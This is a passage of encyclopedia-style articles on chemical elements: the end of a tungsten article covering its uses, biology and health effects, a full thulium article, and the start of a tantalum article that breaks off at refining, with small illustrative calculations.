tungsten. Tungsten carbide rings are brittle, however, and may crack under a sharp blow. Alloys The hardness and heat resistance of tungsten can contribute to useful alloys. 
A good example is high-speed steel, which can contain as much as 18% tungsten. Tungsten's high melting point makes it a good material for applications like rocket nozzles, for example in the UGM-27 Polaris submarine-launched ballistic missile. Tungsten alloys are used in a wide range of applications, including the aerospace and automotive industries and radiation shielding. Superalloys containing tungsten, such as Hastelloy and Stellite, are used in turbine blades and wear-resistant parts and coatings. Tungsten's heat resistance makes it useful in arc welding applications when combined with another highly conductive metal such as silver or copper. The silver or copper provides the necessary conductivity and the tungsten allows the welding rod to withstand the high temperatures of the arc welding environment. Permanent magnets Quenched (martensitic) tungsten steel (approx. 5.5% to 7.0% W with 0.5% to 0.7% C) was used for making hard permanent magnets, due to its high remanence and coercivity, as noted by John Hopkinson (1849–1898) as early as 1886. The magnetic properties of a metal or an alloy are very sensitive to microstructure. For example, while the element tungsten is not ferromagnetic (but iron is), when it is present in steel in these proportions it stabilizes the martensite phase, which has greater coercivity than the ferrite (iron) phase owing to its greater resistance to magnetic domain wall motion. Military Tungsten, usually alloyed with nickel, iron, or cobalt to form heavy alloys, is used in kinetic energy penetrators as an alternative to depleted uranium, in applications where uranium's radioactivity is problematic even in depleted form, or where uranium's additional pyrophoric properties are not desired (for example, in ordinary small arms bullets designed to penetrate body armor). Similarly, tungsten alloys have also been used in shells, grenades, and missiles, to create supersonic shrapnel. Germany used tungsten during World War II to produce shells for anti-tank gun designs using the Gerlich squeeze bore principle to achieve very high muzzle velocity and enhanced armor penetration from comparatively small caliber and light weight field artillery. The weapons were highly effective but a shortage of tungsten used in the shell core, caused in part by the Wolfram Crisis, limited their use. Tungsten has also been used in dense inert metal explosives, which use it as dense powder to reduce collateral damage while increasing the lethality of explosives within a small radius. Chemical applications Tungsten(IV) sulfide is a high-temperature lubricant and is a component of catalysts for hydrodesulfurization, although molybdenum disulfide (MoS2) is more commonly used for such applications. Tungsten oxides are used in ceramic glazes and calcium/magnesium tungstates are used widely in fluorescent lighting. Tungstate crystals are used as scintillation detectors in nuclear physics and nuclear medicine. Other salts that contain tungsten are used in the chemical and tanning industries. Tungsten oxide (WO3) is incorporated into selective catalytic reduction (SCR) catalysts found in coal-fired power plants. These catalysts convert nitrogen oxides (NOx) to nitrogen (N2) and water (H2O) using ammonia (NH3). The tungsten oxide helps with the physical strength of the catalyst and extends catalyst life. Tungsten-containing catalysts are promising for epoxidation, oxidation, and hydrogenolysis reactions. Tungsten heteropoly acids are a key component of multifunctional catalysts. 
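The SCR chemistry mentioned above can be written, in its simplest idealized ("standard SCR") form, as:

4 NO + 4 NH3 + O2 → 4 N2 + 6 H2O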
Tungstates can be used as photocatalysts, while tungsten sulfide can serve as an electrocatalyst. Niche uses Applications requiring its high density include weights, counterweights, ballast keels for yachts, tail ballast for commercial aircraft, rotor weights for civil and military helicopters, and ballast in race cars for NASCAR and Formula One. Being slightly less than twice as dense as lead, tungsten is seen as an alternative (albeit more expensive) to lead in fishing sinkers. Depleted uranium is also used for these purposes, due to its similarly high density. Seventy-five-kg blocks of tungsten were used as "cruise balance mass devices" on the entry vehicle portion of the 2012 Mars Science Laboratory spacecraft. It is an ideal material to use as a dolly for riveting, where the mass necessary for good results can be achieved in a compact bar. High-density alloys of tungsten with nickel, copper or iron are used in high-quality darts (to allow for a smaller diameter and thus tighter groupings) or for artificial flies (tungsten beads allow the fly to sink rapidly). Tungsten is also used as a heavy bolt to lower the rate of fire of the SWD M11/9 sub-machine gun from 1300 RPM to 700 RPM. Some string instrument strings incorporate tungsten. Tungsten is used as an absorber on the electron telescope on the Cosmic Ray System of the two Voyager spacecraft. Gold substitution Its density, similar to that of gold, allows tungsten to be used in jewelry as an alternative to gold or platinum. Metallic tungsten is hypoallergenic, and is harder than gold alloys (though not as hard as tungsten carbide), making it useful for rings that will resist scratching, especially in designs with a brushed finish. Because the density is so similar to that of gold (tungsten is only 0.36% less dense), and its price is of the order of one-thousandth that of gold, tungsten can also be used in the counterfeiting of gold bars, such as by plating a tungsten bar with gold, which has been observed since the 1980s, or by taking an existing gold bar, drilling holes, and replacing the removed gold with tungsten rods. The densities are not exactly the same, and other properties of gold and tungsten differ, but gold-plated tungsten will pass superficial tests. Gold-plated tungsten is available commercially from China (the main source of tungsten), both in jewelry and as bars. Electronics Because it retains its strength at high temperatures and has a high melting point, elemental tungsten is used in many high-temperature applications, such as incandescent light bulb, cathode-ray tube, and vacuum tube filaments, heating elements, and rocket engine nozzles. Its high melting point also makes tungsten suitable for aerospace and high-temperature uses such as electrical, heating, and welding applications, notably in the gas tungsten arc welding process (also called tungsten inert gas (TIG) welding). Because of its conductive properties and relative chemical inertness, tungsten is also used in electrodes, and in the emitter tips in electron-beam instruments that use field emission guns, such as electron microscopes. In electronics, tungsten is used as an interconnect material in integrated circuits, between the silicon dioxide dielectric material and the transistors. It is used in metallic films, which replace the wiring used in conventional electronics with a coat of tungsten (or molybdenum) on silicon. 
The electronic structure of tungsten makes it one of the main sources for X-ray targets, and also for shielding from high-energy radiation (such as in the radiopharmaceutical industry for shielding radioactive samples of FDG). It is also used in gamma imaging as a material from which coded apertures are made, due to its excellent shielding properties. Tungsten powder is used as a filler material in plastic composites, which are used as a nontoxic substitute for lead in bullets, shot, and radiation shields. Because this element's thermal expansion is similar to that of borosilicate glass, it is used for making glass-to-metal seals. In addition to its high melting point, tungsten doped with potassium shows increased shape stability compared with non-doped tungsten. This ensures that the filament does not sag, and that no undesired changes occur. Tungsten is used in producing the vibration motors found in mobile devices. These motors are integral components that provide tactile feedback to users, alerting them to incoming calls, messages, and notifications. Tungsten's high density, hardness, and wear resistance help these motors endure the high-speed rotational vibrations they generate. Nanowires Through top-down nanofabrication processes, tungsten nanowires have been fabricated and studied since 2002. Due to a particularly high surface-to-volume ratio, the formation of a surface oxide layer and the single-crystal nature of such material, the mechanical properties differ fundamentally from those of bulk tungsten. Such tungsten nanowires have potential applications in nanoelectronics and, importantly, as pH probes and gas sensors. Similarly to silicon nanowires, tungsten nanowires are frequently produced from a bulk tungsten precursor followed by a thermal oxidation step to control morphology in terms of length and aspect ratio. Using the Deal–Grove model it is possible to predict the oxidation kinetics of nanowires fabricated through such thermal oxidation processing. Fusion power Due to its high melting point and good erosion resistance, tungsten is a lead candidate for the most exposed sections of the plasma-facing inner wall of nuclear fusion reactors. Tungsten, as a plasma-facing component material, features exceptionally low tritium retention through co-deposition and implantation, which enhances safety by minimizing radioactive inventory, improves fuel efficiency by making more fuel available for fusion reactions, and supports operational continuity by reducing the need for frequent fuel removal from surfaces. It will be used as the plasma-facing material of the divertor in the ITER reactor, and is currently in use in the JET test reactor. Biological role Tungsten, at atomic number Z = 74, is the heaviest element known to be biologically functional. It is used by some bacteria and archaea, but not in eukaryotes. For example, enzymes called oxidoreductases use tungsten similarly to molybdenum by using it in a tungsten-pterin complex with molybdopterin (molybdopterin, despite its name, does not contain molybdenum, but may complex with either molybdenum or tungsten in use by living organisms). Tungsten-using enzymes typically reduce carboxylic acids to aldehydes. The tungsten oxidoreductases may also catalyse oxidations. The first tungsten-requiring enzyme to be discovered also requires selenium, and in this case the tungsten-selenium pair may function analogously to the molybdenum-sulfur pairing of some molybdopterin-requiring enzymes. 
One of the enzymes in the oxidoreductase family which sometimes employ tungsten (bacterial formate dehydrogenase H) is known to use a selenium-molybdenum version of molybdopterin. Acetylene hydratase is an unusual metalloenzyme in that it catalyzes a hydration reaction. Two reaction mechanisms have been proposed, in one of which there is a direct interaction between the tungsten atom and the C≡C triple bond. Although a tungsten-containing xanthine dehydrogenase from bacteria has been found to contain tungsten-molybdopterin and also non-protein-bound selenium, a tungsten-selenium molybdopterin complex has not been definitively described. In soil, tungsten metal oxidizes to the tungstate anion. It can be selectively or non-selectively imported by some prokaryotic organisms and may substitute for molybdate in certain enzymes. Its effect on the action of these enzymes is in some cases inhibitory and in others positive. The soil's chemistry determines how the tungsten polymerizes; alkaline soils cause monomeric tungstates, while acidic soils cause polymeric tungstates. Sodium tungstate and lead have been studied for their effect on earthworms. Lead was found to be lethal at low levels and sodium tungstate was much less toxic, but the tungstate completely inhibited their reproductive ability. Tungsten has been studied as a biological copper metabolic antagonist, in a role similar to the action of molybdenum. It has been found that tetrathiotungstate salts may be used as biological copper chelation chemicals, similar to the tetrathiomolybdates. In archaea Tungsten is essential for some archaea. The following tungsten-utilizing enzymes are known: aldehyde ferredoxin oxidoreductase (AOR) in Thermococcus strain ES-1; formaldehyde ferredoxin oxidoreductase (FOR) in Thermococcus litoralis; and glyceraldehyde-3-phosphate ferredoxin oxidoreductase (GAPOR) in Pyrococcus furiosus. A wtp system is known to selectively transport tungsten in archaea: WtpA is a tungsten-binding protein of the ABC transporter family, WtpB is a permease, and WtpC is an ATPase. Health factors Because tungsten is a rare metal and its compounds are generally inert, the effects of tungsten on the environment are limited. The abundance of tungsten in the Earth's crust is thought to be about 1.5 parts per million. It is the 58th most abundant element found on Earth. It was at first believed to be relatively inert and an only slightly toxic metal, but beginning in the year 2000, the risk that tungsten alloys and their dusts and particulates may induce cancer and several other adverse effects in animals as well as humans has been highlighted by in vitro and in vivo experiments. The median lethal dose LD50 depends strongly on the animal and the method of administration and varies between 59 mg/kg (intravenous, rabbits) and 5000 mg/kg (tungsten metal powder, intraperitoneal, rats). People can be exposed to tungsten in the workplace by breathing it in, swallowing it, skin contact, and eye contact. The National Institute for Occupational Safety and Health (NIOSH) has set a recommended exposure limit (REL) of 5 mg/m3 over an 8-hour workday and a short-term limit of 10 mg/m3. In popular culture Tungsten and tungsten alloys gained popularity through tungsten cubes and spheres. This popularity started in October 2021, and rose again in January 2023, through social media. Tungsten cubes, spheres and other forms became popular mainly as novelty items, owing to the metal's density. 
No other element of comparable density comes close in cost and availability, and some of the denser alternatives are radioactive as well.
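To make the appeal of these objects concrete, here is a minimal sketch (assuming handbook densities of 19.25 g/cm³ for tungsten and 11.34 g/cm³ for lead; the 10 cm edge length is an arbitrary example) comparing the mass of a tungsten cube with the same cube cast in lead:

```python
# Rough illustration of why tungsten cubes are prized for their heft.
# Densities are assumed handbook values, not figures from this article.
W_DENSITY = 19.25   # g/cm^3, tungsten
PB_DENSITY = 11.34  # g/cm^3, lead
EDGE_CM = 10.0      # arbitrary example edge length

volume = EDGE_CM ** 3                     # 1000 cm^3
mass_w_kg = W_DENSITY * volume / 1000     # ~19.3 kg
mass_pb_kg = PB_DENSITY * volume / 1000   # ~11.3 kg

print(f"10 cm tungsten cube: {mass_w_kg:.1f} kg")
print(f"Same cube in lead:   {mass_pb_kg:.1f} kg")
```

A cube that fits in the palm of a hand thus weighs almost 20 kg, which is exactly the novelty such items trade on.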
Physical sciences
Chemical elements_2
null
30047
https://en.wikipedia.org/wiki/Thulium
Thulium
Thulium is a chemical element; it has symbol Tm and atomic number 69. It is the thirteenth element in the lanthanide series of metals. It is the second-least abundant lanthanide in the Earth's crust, after radioactively unstable promethium. It is an easily workable metal with a bright silvery-gray luster. It is fairly soft and slowly tarnishes in air. Despite its high price and rarity, thulium is used as a dopant in solid-state lasers, and as the radiation source in some portable X-ray devices. It has no significant biological role and is not particularly toxic. In 1879, the Swedish chemist Per Teodor Cleve separated two previously unknown components, which he called holmia and thulia, from the rare-earth mineral erbia; these were the oxides of holmium and thulium, respectively. A relatively pure sample of thulium metal was first obtained in 1911. Like the other lanthanides, its most common oxidation state is +3, seen in its oxide, halides and other compounds. In aqueous solution, like compounds of other late lanthanides, soluble thulium compounds form coordination complexes with nine water molecules. Properties Physical properties Pure thulium metal has a bright, silvery luster, which tarnishes on exposure to air. The metal can be cut with a knife, as it has a Mohs hardness of 2 to 3; it is malleable and ductile. Thulium is ferromagnetic below 32 K, antiferromagnetic between 32 and 56 K, and paramagnetic above 56 K. Thulium has two major allotropes: the tetragonal α-Tm and the more stable hexagonal β-Tm. Chemical properties Thulium tarnishes slowly in air and burns readily at 150 °C to form thulium(III) oxide:
4 Tm + 3 O2 → 2 Tm2O3
Thulium is quite electropositive and reacts slowly with cold water and quite quickly with hot water to form thulium hydroxide:
2 Tm + 6 H2O → 2 Tm(OH)3 + 3 H2
Thulium reacts with all the halogens. Reactions are slow at room temperature, but are vigorous above 200 °C:
2 Tm + 3 F2 → 2 TmF3 (white)
2 Tm + 3 Cl2 → 2 TmCl3 (yellow)
2 Tm + 3 Br2 → 2 TmBr3 (white)
2 Tm + 3 I2 → 2 TmI3 (yellow)
Thulium dissolves readily in dilute sulfuric acid to form solutions containing the pale green Tm(III) ions, which exist as [Tm(H2O)9]3+ complexes:
2 Tm + 3 H2SO4 → 2 Tm3+ + 3 SO42− + 3 H2
Thulium reacts with various metallic and non-metallic elements, forming a range of binary compounds. Like most lanthanides, the +3 state is most common and is the only state observed in thulium solutions. Thulium exists as a [Tm(H2O)9]3+ ion in solution. In this state, the thulium ion is surrounded by nine molecules of water. Tm3+ ions exhibit a bright blue luminescence. Because it occurs late in the series, the +2 oxidation state can also exist, stabilized by the nearly full 4f electron shell, but it occurs only in solids. Thulium's only known oxide is Tm2O3. This oxide is sometimes called "thulia". Reddish-purple thulium(II) compounds can be made by the reduction of thulium(III) compounds. Examples of thulium(II) compounds include the halides (except the fluoride). Some hydrated thulium compounds, such as the chloride heptahydrate TmCl3·7H2O, are green or greenish-white. Thulium dichloride reacts very vigorously with water. This reaction yields hydrogen gas and thulium(III) hydroxide, the reddish color of the Tm(II) fading as it is oxidized. Combination of thulium and chalcogens results in thulium chalcogenides. Thulium reacts with hydrogen chloride to produce hydrogen gas and thulium chloride. With nitric acid it yields thulium nitrate, Tm(NO3)3. Isotopes The isotopes of thulium range from 144Tm to 183Tm. The primary decay mode before the most abundant stable isotope, 169Tm, is electron capture, and the primary mode after is beta emission. The primary decay products before 169Tm are element 68 (erbium) isotopes, and the primary products after are element 70 (ytterbium) isotopes. 
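Two standard decay schemes illustrate this pattern; the specific isotopes here are chosen only as examples:

167Tm + e− → 167Er + ν (electron capture, lighter than 169Tm)
171Tm → 171Yb + e− + ν̄ (beta-minus decay, heavier than 169Tm)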
Thulium-169 is thulium's only primordial isotope and is the only isotope of thulium that is thought to be stable; it is predicted to undergo alpha decay to holmium-165 with a very long half-life. The longest-lived radioisotopes are thulium-171, which has a half-life of 1.92 years, and thulium-170, which has a half-life of 128.6 days. Most other isotopes have half-lives of a few minutes or less. In total, 40 isotopes and 26 nuclear isomers of thulium have been detected. Most isotopes of thulium lighter than 169 atomic mass units decay via electron capture or beta-plus decay, although some exhibit significant alpha decay or proton emission. Heavier isotopes undergo beta-minus decay. History Thulium was discovered by Swedish chemist Per Teodor Cleve in 1879 by looking for impurities in the oxides of other rare earth elements (this was the same method Carl Gustaf Mosander had earlier used to discover some other rare earth elements). Cleve started by removing all of the known contaminants of erbia (Er2O3). Upon additional processing, he obtained two new substances: one brown and one green. The brown substance was the oxide of the element holmium and was named holmia by Cleve, and the green substance was the oxide of an unknown element. Cleve named the oxide thulia and its element thulium after Thule, an Ancient Greek place name associated with Scandinavia or Iceland. Thulium's atomic symbol was initially Tu, but this was later changed to Tm. Thulium was so rare that none of the early workers had enough of it to purify sufficiently to actually see the green color; they had to be content with spectroscopically observing the strengthening of the two characteristic absorption bands as erbium was progressively removed. The first researcher to obtain nearly pure thulium was Charles James, a British expatriate working on a large scale at New Hampshire College in Durham, USA. In 1911 he reported his results, having used the method of bromate fractional crystallization he had discovered to do the purification. He famously needed 15,000 purification operations to establish that the material was homogeneous. High-purity thulium oxide was first offered commercially in the late 1950s, as a result of the adoption of ion-exchange separation technology. Lindsay Chemical Division of American Potash & Chemical Corporation offered it in grades of 99% and 99.9% purity. The price per kilogram oscillated between US$4,600 and $13,300 in the period from 1959 to 1998 for 99.9% purity, and it was the second highest among the lanthanides, behind lutetium. Occurrence The element is never found in nature in pure form, but it is found in small quantities in minerals with other rare earths. Thulium is often found with minerals containing yttrium and gadolinium. In particular, thulium occurs in the mineral gadolinite. However, like many other lanthanides, thulium also occurs in the minerals monazite, xenotime, and euxenite. No mineral has yet been found in which thulium is the predominant rare earth. Its abundance in the Earth's crust is 0.5 mg/kg by weight. Thulium makes up approximately 0.5 parts per million of soil, although this value can range from 0.4 to 0.8 parts per million. Thulium makes up 250 parts per quadrillion of seawater. In the Solar System, thulium exists in concentrations of 200 parts per trillion by weight and 1 part per trillion by moles. Thulium ore occurs most commonly in China. However, Australia, Brazil, Greenland, India, Tanzania, and the United States also have large reserves of thulium. 
Total reserves of thulium are approximately 100,000 tonnes. Thulium is the least abundant lanthanide on Earth except for the radioactive promethium. Production Thulium is principally extracted from monazite ores (~0.007% thulium) found in river sands, through ion exchange. Newer ion-exchange and solvent-extraction techniques have led to easier separation of the rare earths, which has yielded much lower costs for thulium production. The principal sources today are the ion adsorption clays of southern China. In these, where about two-thirds of the total rare-earth content is yttrium, thulium is about 0.5% (or about tied with lutetium for rarity). The metal can be isolated through reduction of its oxide with lanthanum metal or by calcium reduction in a closed container. None of thulium's natural compounds are commercially important. Approximately 50 tonnes per year of thulium oxide are produced. In 1996, thulium oxide cost US$20 per gram, and in 2005, 99%-pure thulium metal powder cost US$70 per gram. Applications Lasers Holmium-chromium-thulium triple-doped yttrium aluminium garnet (Ho:Cr:Tm:YAG) is an active laser medium material with high efficiency. It lases at 2080 nm in the infrared and is widely used in military applications, medicine, and meteorology. Single-element thulium-doped YAG (Tm:YAG) lasers operate at 2010 nm. The wavelength of thulium-based lasers is very efficient for superficial ablation of tissue, with minimal coagulation depth in air or in water. This makes thulium lasers attractive for laser-based surgery. X-ray source Despite its high cost, portable X-ray devices use thulium that has been bombarded with neutrons in a nuclear reactor to produce the isotope thulium-170, which has a half-life of 128.6 days and five major emission lines of comparable intensity (at 7.4, 51.354, 52.389, 59.4 and 84.253 keV). These radioactive sources have a useful life of about one year and are used as tools in medical and dental diagnosis, as well as to detect defects in inaccessible mechanical and electronic components. Such sources do not need extensive radiation protection; only a small cup of lead is required. They are among the most popular radiation sources for use in industrial radiography. Thulium-170 is gaining popularity as an X-ray source for cancer treatment via brachytherapy (sealed source radiation therapy). Others Thulium has been used in high-temperature superconductors similarly to yttrium. Thulium potentially has use in ferrites, ceramic magnetic materials that are used in microwave equipment. Thulium is also similar to scandium in that it is used in arc lighting for its unusual spectrum, in this case its green emission lines, which are not covered by other elements. Because thulium fluoresces with a blue color when exposed to ultraviolet light, thulium is put into euro banknotes as a measure against counterfeiting. The blue fluorescence of Tm-doped calcium sulfate has been used in personal dosimeters for visual monitoring of radiation. Tm-doped halides in which Tm is in its 2+ oxidation state are luminescent materials that have been proposed for electric power generating windows based on the principle of a luminescent solar concentrator. Biological role and precautions Soluble thulium salts are mildly toxic, but insoluble thulium salts are completely nontoxic. When injected, thulium can cause degeneration of the liver and spleen and can also cause hemoglobin concentration to fluctuate. Liver damage from thulium is more prevalent in male mice than female mice. Despite this, thulium has a low level of toxicity. 
In humans, thulium occurs in the highest amounts in the liver, kidneys, and bones. Humans typically consume several micrograms of thulium per year. The roots of plants do not take up thulium, and the dry matter of vegetables usually contains one part per billion of thulium. Thulium dust presents a fire and explosion hazard.
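As a rough check on the one-year useful life quoted above for thulium-170 X-ray sources, the sketch below assumes simple exponential decay with the 128.6-day half-life given in the Applications section:

```python
import math

# Fraction of a thulium-170 source's activity remaining over time,
# assuming simple exponential decay with a 128.6-day half-life.
# The "useful life" threshold itself is not defined in the text;
# the printout just shows how quickly the activity falls off.
HALF_LIFE_DAYS = 128.6

def remaining_fraction(days):
    """Fraction of the initial activity left after `days` of decay."""
    return math.exp(-math.log(2) * days / HALF_LIFE_DAYS)

for days in (0, 90, 180, 365):
    print(f"after {days:3d} days: {remaining_fraction(days):.0%} of initial activity")
```

After one year only about 14% of the initial activity remains, consistent with replacing such sources roughly annually.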
Physical sciences
Chemical elements_2
null
30048
https://en.wikipedia.org/wiki/Tantalum
Tantalum
Tantalum is a chemical element; it has symbol Ta and atomic number 73. It is named after Tantalus, a figure in Greek mythology. Tantalum is a very hard, ductile, lustrous, blue-gray transition metal that is highly corrosion-resistant. It is part of the refractory metals group, which are widely used as components of strong high-melting-point alloys. It is a group 5 element, along with vanadium and niobium, and it always occurs in geologic sources together with the chemically similar niobium, mainly in the mineral groups tantalite, columbite and coltan. The chemical inertness and very high melting point of tantalum make it valuable for laboratory and industrial equipment such as reaction vessels and vacuum furnaces. It is used in tantalum capacitors for electronic equipment such as computers. It is being investigated for use as a material for high-quality superconducting resonators in quantum processors. Tantalum is considered a technology-critical element by the European Commission. History Tantalum was discovered in Sweden in 1802 by Anders Ekeberg, in two mineral samples – one from Sweden and the other from Finland. One year earlier, Charles Hatchett had discovered columbium (now niobium). In 1809, the English chemist William Hyde Wollaston compared the oxides of columbium and tantalum, columbite and tantalite. Although the two oxides had different measured densities of 5.918 g/cm3 and 7.935 g/cm3, he concluded that they were identical and kept the name tantalum. After Friedrich Wöhler confirmed these results, it was thought that columbium and tantalum were the same element. This conclusion was disputed in 1846 by the German chemist Heinrich Rose, who argued that there were two additional elements in the tantalite sample, and he named them after the children of Tantalus: niobium (from Niobe), and pelopium (from Pelops). The supposed element "pelopium" was later identified as a mixture of tantalum and niobium, and it was found that the niobium was identical to the columbium already discovered in 1801 by Hatchett. The differences between tantalum and niobium were demonstrated unequivocally in 1864 by Christian Wilhelm Blomstrand, and Henri Etienne Sainte-Claire Deville, as well as by Louis J. Troost, who determined the empirical formulas of some of their compounds in 1865. Further confirmation came from the Swiss chemist Jean Charles Galissard de Marignac, in 1866, who proved that there were only two elements. These discoveries did not stop scientists from publishing articles about the so-called ilmenium until 1871. De Marignac was the first to produce the metallic form of tantalum in 1864, when he reduced tantalum chloride by heating it in an atmosphere of hydrogen. Early investigators had only been able to produce impure tantalum, and the first relatively pure ductile metal was produced by Werner von Bolton in Charlottenburg in 1903. Wires made with metallic tantalum were used for light bulb filaments until tungsten replaced it in widespread use. The name tantalum was derived from the name of the mythological Tantalus, the father of Niobe in Greek mythology. In the story, he had been punished after death by being condemned to stand knee-deep in water with perfect fruit growing above his head, both of which eternally tantalized him. (If he bent to drink the water, it drained below the level he could reach, and if he reached for the fruit, the branches moved out of his grasp.) Anders Ekeberg wrote "This metal I call tantalum ... 
partly in allusion to its incapacity, when immersed in acid, to absorb any and be saturated." For decades, the commercial technology for separating tantalum from niobium involved the fractional crystallization of potassium heptafluorotantalate away from potassium oxypentafluoroniobate monohydrate, a process that was discovered by Jean Charles Galissard de Marignac in 1866. This method has been supplanted by solvent extraction from fluoride-containing solutions of tantalum. Characteristics Physical properties Tantalum is dark (blue-gray), dense, ductile, very hard, easily fabricated, and highly conductive of heat and electricity. The metal is highly resistant to corrosion by acids: at temperatures below 150 °C tantalum is almost completely immune to attack by the normally aggressive aqua regia. It can be dissolved with hydrofluoric acid or acidic solutions containing the fluoride ion and sulfur trioxide, as well as with molten potassium hydroxide. Tantalum's high melting point of 3017 °C (boiling point 5458 °C) is exceeded among metals only by tungsten, rhenium and osmium, and among all the elements also by carbon. Tantalum exists in two crystalline phases, alpha and beta. The alpha phase is stable at all temperatures up to the melting point and has a body-centered cubic structure with lattice constant a = 0.33029 nm at 20 °C. It is relatively ductile, has a Knoop hardness of 200–400 HN and an electrical resistivity of 15–60 μΩ⋅cm. The beta phase is hard and brittle; its crystal symmetry is tetragonal (space group P42/mnm, a = 1.0194 nm, c = 0.5313 nm), its Knoop hardness is 1000–1300 HN and its electrical resistivity is relatively high at 170–210 μΩ⋅cm. The beta phase is metastable and converts to the alpha phase upon heating to 750–775 °C. Bulk tantalum is almost entirely alpha phase, and the beta phase usually exists as thin films obtained by magnetron sputtering, chemical vapor deposition or electrochemical deposition from a eutectic molten salt solution. Isotopes Natural tantalum consists of two stable isotopes: 180mTa (0.012%) and 181Ta (99.988%). 180mTa (m denotes a metastable state) is predicted to decay in three ways: isomeric transition to the ground state of 180Ta, beta decay to 180W, or electron capture to 180Hf. However, radioactivity of this nuclear isomer has never been observed, and only a lower limit on its half-life of 2.9 × 10^17 years has been set. The ground state of 180Ta has a half-life of only 8 hours. 180mTa is the only naturally occurring nuclear isomer (excluding radiogenic and cosmogenic short-lived nuclides). It is also the rarest primordial isotope in the Universe, taking into account the elemental abundance of tantalum and the isotopic abundance of 180mTa in the natural mixture of isotopes (and again excluding radiogenic and cosmogenic short-lived nuclides). Tantalum has been examined theoretically as a "salting" material for nuclear weapons (cobalt is the better-known hypothetical salting material). An external shell of 181Ta would be irradiated by the intensive high-energy neutron flux from a hypothetical exploding nuclear weapon. This would transmute the tantalum into the radioactive isotope 182Ta, which has a half-life of 114.4 days and produces gamma rays with approximately 1.12 million electron-volts (MeV) of energy apiece, which would significantly increase the radioactivity of the nuclear fallout from the explosion for several months. Such "salted" weapons have never been built or tested, as far as is publicly known, and certainly never used as weapons. 
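In simplified form, the activation sequence behind this salting scheme is ordinary neutron capture followed by beta decay:

181Ta + n → 182Ta + γ
182Ta → 182W + e− + ν̄ (half-life 114.4 days)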
Tantalum can be used as a target material for accelerated proton beams for the production of various short-lived isotopes including 8Li, 80Rb, and 160Yb. Chemical compounds Tantalum forms compounds in oxidation states −III to +V. Most commonly encountered are oxides of Ta(V), a category that includes all of its minerals. The chemical properties of Ta and Nb are very similar. In aqueous media, Ta exhibits only the +V oxidation state. Like niobium, tantalum is barely soluble in dilute solutions of hydrochloric, sulfuric, nitric and phosphoric acids due to the precipitation of hydrous Ta(V) oxide. In basic media, Ta can be solubilized due to the formation of polyoxotantalate species. Oxides, nitrides, carbides, sulfides Tantalum pentoxide (Ta2O5) is the most important compound from the perspective of applications. Oxides of tantalum in lower oxidation states are numerous, including many defect structures, and are lightly studied or poorly characterized. Tantalates, compounds containing [TaO4]3− or [TaO3]−, are numerous. Lithium tantalate (LiTaO3) adopts a perovskite structure. Lanthanum tantalate (LaTaO4) contains isolated tetrahedra. As in the cases of other refractory metals, the hardest known compounds of tantalum are nitrides and carbides. Tantalum carbide, TaC, like the more commonly used tungsten carbide, is a hard ceramic that is used in cutting tools. Tantalum(III) nitride is used as a thin-film insulator in some microelectronic fabrication processes. The best-studied chalcogenide is tantalum sulfide (TaS2), a layered semiconductor, as seen for other transition metal dichalcogenides. A tantalum-tellurium alloy forms quasicrystals. Halides Tantalum halides span the oxidation states of +5, +4, and +3. Tantalum pentafluoride (TaF5) is a white solid with a melting point of 97.0 °C. The anion [TaF7]2− is used for its separation from niobium. The chloride TaCl5, which exists as a dimer, is the main reagent in the synthesis of new Ta compounds. It hydrolyzes readily to an oxychloride. The lower halides TaX4 and TaX3 feature Ta–Ta bonds. Organotantalum compounds Organotantalum compounds include pentamethyltantalum, mixed alkyltantalum chlorides, alkyltantalum hydrides, alkylidene complexes as well as cyclopentadienyl derivatives of the same. Diverse salts and substituted derivatives are known for the hexacarbonyl [Ta(CO)6]− and related isocyanides. Occurrence Tantalum is estimated to make up about 1 ppm or 2 ppm of the Earth's crust by weight. There are many species of tantalum minerals, only some of which are so far being used by industry as raw materials: tantalite (a series consisting of tantalite-(Fe), tantalite-(Mn) and tantalite-(Mg)), microlite (now a group name), wodginite, euxenite (actually euxenite-(Y)), and polycrase (actually polycrase-(Y)). Tantalite (Fe, Mn)Ta2O6 is the most important mineral for tantalum extraction. Tantalite has the same mineral structure as columbite (Fe, Mn)(Ta, Nb)2O6; when there is more tantalum than niobium it is called tantalite, and when there is more niobium than tantalum it is called columbite (or niobite). The high density of tantalite and other tantalum-containing minerals makes gravitational separation the best method of concentration. Other minerals include samarskite and fergusonite. Australia was the main producer of tantalum prior to the 2010s, with Global Advanced Metals (formerly known as Talison Minerals) being the largest tantalum mining company in that country. They operate two mines in Western Australia, Greenbushes in the southwest and Wodgina in the Pilbara region. 
The Wodgina mine was reopened in January 2011 after mining at the site was suspended in late 2008 due to the global financial crisis. Less than a year after it reopened, Global Advanced Metals announced that, due again to "softening tantalum demand" and other factors, tantalum mining operations were to cease at the end of February 2012. Wodgina produces a primary tantalum concentrate which is further upgraded at the Greenbushes operation before being sold to customers. Whereas the large-scale producers of niobium are in Brazil and Canada, the ore there also yields a small percentage of tantalum. Some other countries such as China, Ethiopia, and Mozambique mine ores with a higher percentage of tantalum, and they produce a significant percentage of the world's output of it. Tantalum is also produced in Thailand and Malaysia as a by-product of the tin mining there. During gravitational separation of the ores from placer deposits, not only is cassiterite (SnO2) found, but a small percentage of tantalite is also included. The slag from the tin smelters then contains economically useful amounts of tantalum, which is leached from the slag. World tantalum mine production has undergone an important geographic shift since the start of the 21st century, when production was predominantly from Australia and Brazil. Beginning in 2007 and through 2014, the major sources of tantalum production from mines dramatically shifted to the Democratic Republic of the Congo, Rwanda, and some other African countries. Future sources of supply of tantalum, in order of estimated size, are being explored in Saudi Arabia, Egypt, Greenland, China, Mozambique, Canada, Australia, the United States, Finland, and Brazil. Status as a conflict resource Tantalum is considered a conflict resource. Coltan, the industrial name for a columbite–tantalite mineral from which niobium and tantalum are extracted, can also be found in Central Africa, which is why tantalum is being linked to warfare in the Democratic Republic of the Congo (formerly Zaire). According to an October 23, 2003 United Nations report, the smuggling and exportation of coltan has helped fuel the war in the Congo, a crisis that has resulted in approximately 5.4 million deaths since 1998 – making it the world's deadliest documented conflict since World War II. Ethical questions have been raised about responsible corporate behavior, human rights, and the endangerment of wildlife, due to the exploitation of resources such as coltan in the armed conflict regions of the Congo Basin. The United States Geological Survey reports in its yearbook that this region produced a little less than 1% of the world's tantalum output in 2002–2006, peaking at 10% in 2000 and 2008. USGS data published in January 2021 indicated that close to 40% of the world's tantalum mine production came from the Democratic Republic of the Congo, with another 18% coming from neighboring Rwanda and Burundi. Production and fabrication Several steps are involved in the extraction of tantalum from tantalite. First, the mineral is crushed and concentrated by gravity separation. This is generally carried out near the mine site. Refining The refining of tantalum from its ores is one of the more demanding separation processes in industrial 